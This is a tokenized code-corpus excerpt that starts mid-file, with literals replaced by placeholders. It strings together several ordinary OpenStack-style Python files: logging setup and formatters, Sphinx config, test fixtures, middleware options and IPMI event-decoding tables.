, <EOL> '<STR_LIT:args>' : record . args , <EOL> '<STR_LIT>' : record . levelname , <EOL> '<STR_LIT>' : record . levelno , <EOL> '<STR_LIT>' : record . pathname , <EOL> '<STR_LIT:filename>' : record . filename , <EOL> '<STR_LIT>' : record . module , <EOL> '<STR_LIT>' : record . lineno , <EOL> '<STR_LIT>' : record . funcName , <EOL> '<STR_LIT>' : record . created , <EOL> '<STR_LIT>' : record . msecs , <EOL> '<STR_LIT>' : record . relativeCreated , <EOL> '<STR_LIT>' : record . thread , <EOL> '<STR_LIT>' : record . threadName , <EOL> '<STR_LIT>' : record . processName , <EOL> '<STR_LIT>' : record . process , <EOL> '<STR_LIT>' : None } <EOL> if hasattr ( record , '<STR_LIT>' ) : <EOL> message [ '<STR_LIT>' ] = record . extra <EOL> if record . exc_info : <EOL> message [ '<STR_LIT>' ] = self . formatException ( record . exc_info ) <EOL> return jsonutils . dumps ( message ) <EOL> def _create_logging_excepthook ( product_name ) : <EOL> def logging_excepthook ( exc_type , value , tb ) : <EOL> extra = { '<STR_LIT>' : ( exc_type , value , tb ) } <EOL> getLogger ( product_name ) . critical ( <EOL> "<STR_LIT>" . join ( traceback . format_exception_only ( exc_type , value ) ) , <EOL> ** extra ) <EOL> return logging_excepthook <EOL> class LogConfigError ( Exception ) : <EOL> message = _ ( '<STR_LIT>' ) <EOL> def __init__ ( self , log_config , err_msg ) : <EOL> self . log_config = log_config <EOL> self . err_msg = err_msg <EOL> def __str__ ( self ) : <EOL> return self . message % dict ( log_config = self . log_config , <EOL> err_msg = self . err_msg ) <EOL> def _load_log_config ( log_config_append ) : <EOL> try : <EOL> logging . config . fileConfig ( log_config_append , <EOL> disable_existing_loggers = False ) <EOL> except ( moves . configparser . Error , KeyError ) as exc : <EOL> raise LogConfigError ( log_config_append , six . text_type ( exc ) ) <EOL> def setup ( product_name , version = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if CONF . log_config_append : <EOL> _load_log_config ( CONF . log_config_append ) <EOL> else : <EOL> _setup_logging_from_conf ( product_name , version ) <EOL> sys . excepthook = _create_logging_excepthook ( product_name ) <EOL> def set_defaults ( logging_context_format_string = None , <EOL> default_log_levels = None ) : <EOL> if default_log_levels is not None : <EOL> cfg . set_defaults ( <EOL> log_opts , <EOL> default_log_levels = default_log_levels ) <EOL> if logging_context_format_string is not None : <EOL> cfg . set_defaults ( <EOL> log_opts , <EOL> logging_context_format_string = logging_context_format_string ) <EOL> def _find_facility_from_conf ( ) : <EOL> facility_names = logging . handlers . SysLogHandler . facility_names <EOL> facility = getattr ( logging . handlers . SysLogHandler , <EOL> CONF . syslog_log_facility , <EOL> None ) <EOL> if facility is None and CONF . syslog_log_facility in facility_names : <EOL> facility = facility_names . get ( CONF . syslog_log_facility ) <EOL> if facility is None : <EOL> valid_facilities = facility_names . keys ( ) <EOL> consts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> valid_facilities . extend ( consts ) <EOL> raise TypeError ( _ ( '<STR_LIT>' ) % <EOL> '<STR_LIT:U+002CU+0020>' . join ( "<STR_LIT>" % fac <EOL> for fac in valid_facilities ) ) <EOL> return facility <EOL> class RFCSysLogHandler ( logging . handlers . SysLogHandler ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . binary_name = _get_binary_name ( ) <EOL> logging . handlers . SysLogHandler . __init__ ( self , * args , ** kwargs ) <EOL> def format ( self , record ) : <EOL> msg = logging . handlers . SysLogHandler . format ( self , record ) <EOL> msg = self . binary_name + '<STR_LIT:U+0020>' + msg <EOL> return msg <EOL> def _setup_logging_from_conf ( project , version ) : <EOL> log_root = getLogger ( None ) . logger <EOL> for handler in log_root . handlers : <EOL> log_root . removeHandler ( handler ) <EOL> if CONF . use_syslog : <EOL> facility = _find_facility_from_conf ( ) <EOL> if CONF . use_syslog_rfc_format : <EOL> syslog = RFCSysLogHandler ( address = '<STR_LIT>' , <EOL> facility = facility ) <EOL> else : <EOL> syslog = logging . handlers . SysLogHandler ( address = '<STR_LIT>' , <EOL> facility = facility ) <EOL> log_root . addHandler ( syslog ) <EOL> logpath = _get_log_file_path ( ) <EOL> if logpath : <EOL> filelog = logging . handlers . WatchedFileHandler ( logpath ) <EOL> log_root . addHandler ( filelog ) <EOL> if CONF . use_stderr : <EOL> streamlog = ColorHandler ( ) <EOL> log_root . addHandler ( streamlog ) <EOL> elif not logpath : <EOL> streamlog = logging . StreamHandler ( sys . stdout ) <EOL> log_root . addHandler ( streamlog ) <EOL> if CONF . publish_errors : <EOL> try : <EOL> handler = importutils . import_object ( <EOL> "<STR_LIT>" , <EOL> logging . ERROR ) <EOL> except ImportError : <EOL> handler = importutils . import_object ( <EOL> "<STR_LIT>" , <EOL> logging . ERROR ) <EOL> log_root . addHandler ( handler ) <EOL> datefmt = CONF . log_date_format <EOL> for handler in log_root . handlers : <EOL> if CONF . log_format : <EOL> handler . setFormatter ( logging . Formatter ( fmt = CONF . log_format , <EOL> datefmt = datefmt ) ) <EOL> log_root . info ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> handler . setFormatter ( ContextFormatter ( project = project , <EOL> version = version , <EOL> datefmt = datefmt ) ) <EOL> if CONF . debug : <EOL> log_root . setLevel ( logging . DEBUG ) <EOL> elif CONF . verbose : <EOL> log_root . setLevel ( logging . INFO ) <EOL> else : <EOL> log_root . setLevel ( logging . WARNING ) <EOL> for pair in CONF . default_log_levels : <EOL> mod , _sep , level_name = pair . partition ( '<STR_LIT:=>' ) <EOL> logger = logging . getLogger ( mod ) <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> level = logging . getLevelName ( level_name ) <EOL> logger . setLevel ( level ) <EOL> else : <EOL> logger . setLevel ( level_name ) <EOL> _loggers = { } <EOL> def getLogger ( name = '<STR_LIT>' , version = '<STR_LIT>' ) : <EOL> if name not in _loggers : <EOL> _loggers [ name ] = ContextAdapter ( logging . getLogger ( name ) , <EOL> name , <EOL> version ) <EOL> return _loggers [ name ] <EOL> def getLazyLogger ( name = '<STR_LIT>' , version = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return LazyAdapter ( name , version ) <EOL> class WritableLogger ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , logger , level = logging . INFO ) : <EOL> self . logger = logger <EOL> self . level = level <EOL> def write ( self , msg ) : <EOL> self . logger . log ( self . level , msg . rstrip ( ) ) <EOL> class ContextFormatter ( logging . Formatter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . project = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . version = kwargs . pop ( '<STR_LIT:version>' , '<STR_LIT>' ) <EOL> logging . Formatter . __init__ ( self , * args , ** kwargs ) <EOL> def format ( self , record ) : <EOL> """<STR_LIT>""" <EOL> record . project = self . project <EOL> record . version = self . version <EOL> context = getattr ( local . store , '<STR_LIT>' , None ) <EOL> if context : <EOL> d = _dictify_context ( context ) <EOL> for k , v in d . items ( ) : <EOL> setattr ( record , k , v ) <EOL> for key in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if key not in record . __dict__ : <EOL> record . __dict__ [ key ] = '<STR_LIT>' <EOL> if record . __dict__ . get ( '<STR_LIT>' ) : <EOL> fmt = CONF . logging_context_format_string <EOL> else : <EOL> fmt = CONF . logging_default_format_string <EOL> if ( record . levelno == logging . DEBUG and <EOL> CONF . logging_debug_format_suffix ) : <EOL> fmt += "<STR_LIT:U+0020>" + CONF . logging_debug_format_suffix <EOL> if sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:2> ) : <EOL> self . _fmt = fmt <EOL> else : <EOL> self . _style = logging . PercentStyle ( fmt ) <EOL> self . _fmt = self . _style . _fmt <EOL> if record . exc_info : <EOL> record . exc_text = self . formatException ( record . exc_info , record ) <EOL> return logging . Formatter . format ( self , record ) <EOL> def formatException ( self , exc_info , record = None ) : <EOL> """<STR_LIT>""" <EOL> if not record : <EOL> return logging . Formatter . formatException ( self , exc_info ) <EOL> stringbuffer = moves . StringIO ( ) <EOL> traceback . print_exception ( exc_info [ <NUM_LIT:0> ] , exc_info [ <NUM_LIT:1> ] , exc_info [ <NUM_LIT:2> ] , <EOL> None , stringbuffer ) <EOL> lines = stringbuffer . getvalue ( ) . split ( '<STR_LIT:\n>' ) <EOL> stringbuffer . close ( ) <EOL> if CONF . logging_exception_prefix . find ( '<STR_LIT>' ) != - <NUM_LIT:1> : <EOL> record . asctime = self . formatTime ( record , self . datefmt ) <EOL> formatted_lines = [ ] <EOL> for line in lines : <EOL> pl = CONF . logging_exception_prefix % record . __dict__ <EOL> fl = '<STR_LIT>' % ( pl , line ) <EOL> formatted_lines . append ( fl ) <EOL> return '<STR_LIT:\n>' . join ( formatted_lines ) <EOL> class ColorHandler ( logging . StreamHandler ) : <EOL> LEVEL_COLORS = { <EOL> logging . DEBUG : '<STR_LIT>' , <EOL> logging . INFO : '<STR_LIT>' , <EOL> logging . AUDIT : '<STR_LIT>' , <EOL> logging . WARN : '<STR_LIT>' , <EOL> logging . ERROR : '<STR_LIT>' , <EOL> logging . CRITICAL : '<STR_LIT>' , <EOL> } <EOL> def format ( self , record ) : <EOL> record . color = self . LEVEL_COLORS [ record . levelno ] <EOL> return logging . StreamHandler . format ( self , record ) <EOL> class DeprecatedConfig ( Exception ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , msg ) : <EOL> super ( Exception , self ) . __init__ ( self . message % dict ( msg = msg ) ) </s>
<s> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> import pbr . version <EOL> occ_version = pbr . version . VersionInfo ( '<STR_LIT>' ) <EOL> version = occ_version . canonical_version_string ( ) <EOL> release = occ_version . version_string_with_vcs ( ) <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> import os <EOL> import fixtures <EOL> import testtools <EOL> _TRUE_VALUES = ( '<STR_LIT:true>' , '<STR_LIT:1>' , '<STR_LIT:yes>' ) <EOL> class TestCase ( testtools . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( TestCase , self ) . setUp ( ) <EOL> test_timeout = os . environ . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> try : <EOL> test_timeout = int ( test_timeout ) <EOL> except ValueError : <EOL> test_timeout = <NUM_LIT:0> <EOL> if test_timeout > <NUM_LIT:0> : <EOL> self . useFixture ( fixtures . Timeout ( test_timeout , gentle = True ) ) <EOL> self . useFixture ( fixtures . NestedTempfile ( ) ) <EOL> self . useFixture ( fixtures . TempHomeDir ( ) ) <EOL> if os . environ . get ( '<STR_LIT>' ) in _TRUE_VALUES : <EOL> stdout = self . useFixture ( fixtures . StringStream ( '<STR_LIT>' ) ) . stream <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , stdout ) ) <EOL> if os . environ . get ( '<STR_LIT>' ) in _TRUE_VALUES : <EOL> stderr = self . useFixture ( fixtures . StringStream ( '<STR_LIT>' ) ) . stream <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , stderr ) ) <EOL> self . log_fixture = self . useFixture ( fixtures . FakeLogger ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import gettext <EOL> import fixtures <EOL> import six <EOL> from oslo_i18n import _lazy <EOL> from oslo_i18n import _message <EOL> class Translation ( fixtures . Fixture ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , domain = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . domain = domain <EOL> def lazy ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> return _message . Message ( msg , domain = self . domain ) <EOL> def immediate ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> return six . text_type ( msg ) <EOL> class ToggleLazy ( fixtures . Fixture ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , enabled ) : <EOL> """<STR_LIT>""" <EOL> super ( ToggleLazy , self ) . __init__ ( ) <EOL> self . _enabled = enabled <EOL> self . _original_value = _lazy . USE_LAZY <EOL> def setUp ( self ) : <EOL> super ( ToggleLazy , self ) . setUp ( ) <EOL> self . addCleanup ( self . _restore_original ) <EOL> _lazy . enable_lazy ( self . _enabled ) <EOL> def _restore_original ( self ) : <EOL> _lazy . enable_lazy ( self . _original_value ) <EOL> class _PrefixTranslator ( gettext . NullTranslations ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , fp = None , prefix = '<STR_LIT>' ) : <EOL> gettext . NullTranslations . __init__ ( self , fp ) <EOL> self . prefix = prefix <EOL> def gettext ( self , message ) : <EOL> msg = gettext . NullTranslations . gettext ( self , message ) <EOL> return self . prefix + msg <EOL> def ugettext ( self , message ) : <EOL> msg = gettext . NullTranslations . ugettext ( self , message ) <EOL> return self . prefix + msg <EOL> def _prefix_translations ( * x , ** y ) : <EOL> """<STR_LIT>""" <EOL> return _PrefixTranslator ( prefix = x [ <NUM_LIT:0> ] + '<STR_LIT:/>' + y [ '<STR_LIT>' ] [ <NUM_LIT:0> ] + '<STR_LIT>' ) <EOL> class PrefixLazyTranslation ( fixtures . Fixture ) : <EOL> """<STR_LIT>""" <EOL> _DEFAULT_LANG = '<STR_LIT>' <EOL> def __init__ ( self , languages = None , locale = None ) : <EOL> super ( PrefixLazyTranslation , self ) . __init__ ( ) <EOL> self . languages = languages or [ PrefixLazyTranslation . _DEFAULT_LANG ] <EOL> self . locale = locale <EOL> def setUp ( self ) : <EOL> super ( PrefixLazyTranslation , self ) . setUp ( ) <EOL> self . useFixture ( ToggleLazy ( True ) ) <EOL> self . useFixture ( fixtures . MonkeyPatch ( <EOL> '<STR_LIT>' , <EOL> lambda * x , ** y : self . languages ) ) <EOL> self . useFixture ( fixtures . MonkeyPatch ( <EOL> '<STR_LIT>' , <EOL> lambda * x , ** y : self . languages ) ) <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , <EOL> _prefix_translations ) ) <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , <EOL> lambda * x , ** y : self . locale ) ) </s>
<s> import inspect <EOL> import logging <EOL> import logging . config <EOL> import logging . handlers <EOL> import os <EOL> try : <EOL> import syslog <EOL> except ImportError : <EOL> syslog = None <EOL> NullHandler = logging . NullHandler <EOL> def _get_binary_name ( ) : <EOL> return os . path . basename ( inspect . stack ( ) [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) <EOL> _AUDIT = logging . INFO + <NUM_LIT:1> <EOL> _TRACE = <NUM_LIT:5> <EOL> if syslog is not None : <EOL> class OSSysLogHandler ( logging . Handler ) : <EOL> """<STR_LIT>""" <EOL> severity_map = { <EOL> "<STR_LIT>" : syslog . LOG_CRIT , <EOL> "<STR_LIT>" : syslog . LOG_DEBUG , <EOL> "<STR_LIT>" : syslog . LOG_ERR , <EOL> "<STR_LIT>" : syslog . LOG_INFO , <EOL> "<STR_LIT>" : syslog . LOG_WARNING , <EOL> "<STR_LIT>" : syslog . LOG_WARNING , <EOL> } <EOL> def __init__ ( self , facility = syslog . LOG_USER ) : <EOL> logging . Handler . __init__ ( self ) <EOL> binary_name = _get_binary_name ( ) <EOL> syslog . openlog ( binary_name , <NUM_LIT:0> , facility ) <EOL> def emit ( self , record ) : <EOL> syslog . syslog ( self . severity_map . get ( record . levelname , <EOL> syslog . LOG_DEBUG ) , <EOL> self . format ( record ) ) <EOL> class ColorHandler ( logging . StreamHandler ) : <EOL> LEVEL_COLORS = { <EOL> _TRACE : '<STR_LIT>' , <EOL> logging . DEBUG : '<STR_LIT>' , <EOL> logging . INFO : '<STR_LIT>' , <EOL> _AUDIT : '<STR_LIT>' , <EOL> logging . WARN : '<STR_LIT>' , <EOL> logging . ERROR : '<STR_LIT>' , <EOL> logging . CRITICAL : '<STR_LIT>' , <EOL> } <EOL> def format ( self , record ) : <EOL> record . color = self . LEVEL_COLORS [ record . levelno ] <EOL> return logging . StreamHandler . format ( self , record ) </s>
<s> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> import copy <EOL> import itertools <EOL> from oslo_middleware import cors <EOL> from oslo_middleware import sizelimit <EOL> from oslo_middleware import ssl <EOL> def list_opts ( ) : <EOL> """<STR_LIT>""" <EOL> return list ( <EOL> itertools . chain ( <EOL> list_opts_sizelimit ( ) , <EOL> list_opts_ssl ( ) , <EOL> list_opts_cors ( ) , <EOL> ) <EOL> ) <EOL> def list_opts_sizelimit ( ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> ( '<STR_LIT>' , copy . deepcopy ( sizelimit . _opts ) ) , <EOL> ] <EOL> def list_opts_ssl ( ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> ( '<STR_LIT>' , copy . deepcopy ( ssl . OPTS ) ) , <EOL> ] <EOL> def list_opts_cors ( ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> ( '<STR_LIT>' , copy . deepcopy ( cors . CORS_OPTS ) ) , <EOL> ( '<STR_LIT>' , copy . deepcopy ( cors . CORS_OPTS ) ) <EOL> ] </s>
<s> import mock <EOL> from oslo_vmware . objects import datacenter <EOL> from oslo_vmware . tests import base <EOL> class DatacenterTestCase ( base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_dc ( self ) : <EOL> self . assertRaises ( ValueError , datacenter . Datacenter , None , '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , datacenter . Datacenter , mock . Mock ( ) , None ) <EOL> dc = datacenter . Datacenter ( '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> self . assertEqual ( '<STR_LIT>' , dc . ref ) <EOL> self . assertEqual ( '<STR_LIT:name>' , dc . name ) </s>
<s> HPSSA_NO_DRIVES = '''<STR_LIT>''' <EOL> HPSSA_ONE_DRIVE = '''<STR_LIT>''' <EOL> HPSSA_ONE_DRIVE_RAID_50 = '''<STR_LIT>''' <EOL> HPSSA_ONE_DRIVE_100GB_RAID_5 = '''<STR_LIT>''' <EOL> HPSSA_TWO_DRIVES_100GB_RAID5_50GB_RAID1 = '''<STR_LIT>''' <EOL> HPSSA_BAD_SIZE_PHYSICAL_DRIVE = '''<STR_LIT>''' <EOL> HPSSA_BAD_SIZE_LOGICAL_DRIVE = '''<STR_LIT>''' <EOL> HPSSA_SMALL_SIZE_PHYSICAL_DRIVE = '''<STR_LIT>''' <EOL> ARRAY_ACCOMODATE_LOGICAL_DISK = '''<STR_LIT>''' <EOL> ARRAY_ACCOMODATE_LOGICAL_DISK_INVALID = '''<STR_LIT>''' <EOL> HPSSA_NO_DRIVES_2_PHYSICAL_DISKS = '''<STR_LIT>''' <EOL> ONE_DRIVE_RAID_1 = '''<STR_LIT>''' <EOL> DRIVE_2_RAID_1_OKAY_TO_SHARE = '''<STR_LIT>''' <EOL> TWO_DRIVES_50GB_RAID1 = '''<STR_LIT>''' <EOL> NO_DRIVES_HPSSA_7_DISKS = '''<STR_LIT>''' <EOL> ONE_DRIVE_RAID_1_50_GB = '''<STR_LIT>''' <EOL> TWO_DRIVES_50GB_RAID1_MAXGB_RAID5 = '''<STR_LIT>''' </s>
<s> import pyghmi . constants as pygconst <EOL> import pyghmi . exceptions as pygexc <EOL> import pyghmi . ipmi . private . constants as ipmiconst <EOL> import struct <EOL> import time <EOL> psucfg_errors = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> } <EOL> firmware_progress = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <EOL> <NUM_LIT:8> : '<STR_LIT>' , <EOL> <NUM_LIT:9> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> firmware_errors = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <EOL> <NUM_LIT:8> : '<STR_LIT>' , <EOL> <NUM_LIT:9> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> auxlog_actions = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> } <EOL> restart_causes = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <EOL> <NUM_LIT:8> : '<STR_LIT>' , <EOL> <NUM_LIT:9> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> slot_types = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <EOL> <NUM_LIT:8> : '<STR_LIT>' , <EOL> <NUM_LIT:9> : '<STR_LIT>' , <EOL> <NUM_LIT:10> : '<STR_LIT>' , <EOL> <NUM_LIT:11> : '<STR_LIT>' , <EOL> } <EOL> power_states = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <EOL> <NUM_LIT:8> : '<STR_LIT>' , <EOL> <NUM_LIT:9> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> watchdog_boot_phases = { <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> } <EOL> version_changes = { <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <EOL> <NUM_LIT:8> : '<STR_LIT>' , <EOL> <NUM_LIT:9> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> fru_states = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' , <EOL> <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <EOL> <NUM_LIT:4> : '<STR_LIT>' , <EOL> <NUM_LIT:5> : '<STR_LIT>' , <EOL> <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <EOL> <NUM_LIT:8> : '<STR_LIT>' , <EOL> <NUM_LIT:9> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> def decode_eventdata ( sensor_type , offset , eventdata , sdr ) : <EOL> """<STR_LIT>""" <EOL> if sensor_type == <NUM_LIT:5> and offset == <NUM_LIT:4> : <EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:1> ] ) <EOL> elif sensor_type == <NUM_LIT:8> and offset == <NUM_LIT:6> : <EOL> errtype = eventdata [ <NUM_LIT:2> ] & <NUM_LIT> <EOL> return psucfg_errors . get ( errtype , '<STR_LIT>' ) <EOL> elif sensor_type == <NUM_LIT> and offset == <NUM_LIT:8> : <EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:2> ] ) <EOL> elif sensor_type == <NUM_LIT> : <EOL> if offset == <NUM_LIT:0> : <EOL> return firmware_errors . get ( eventdata [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> elif offset in ( <NUM_LIT:1> , <NUM_LIT:2> ) : <EOL> return firmware_progress . get ( eventdata [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> elif sensor_type == <NUM_LIT> : <EOL> if offset == <NUM_LIT:0> : <EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:1> ] ) <EOL> elif offset == <NUM_LIT:1> : <EOL> return '<STR_LIT>' . format ( <EOL> eventdata [ <NUM_LIT:1> ] , eventdata [ <NUM_LIT:2> ] & <NUM_LIT> ) <EOL> elif offset == <NUM_LIT:5> : <EOL> return '<STR_LIT>' . format ( eventdata [ <NUM_LIT:2> ] ) <EOL> elif offset == <NUM_LIT:6> : 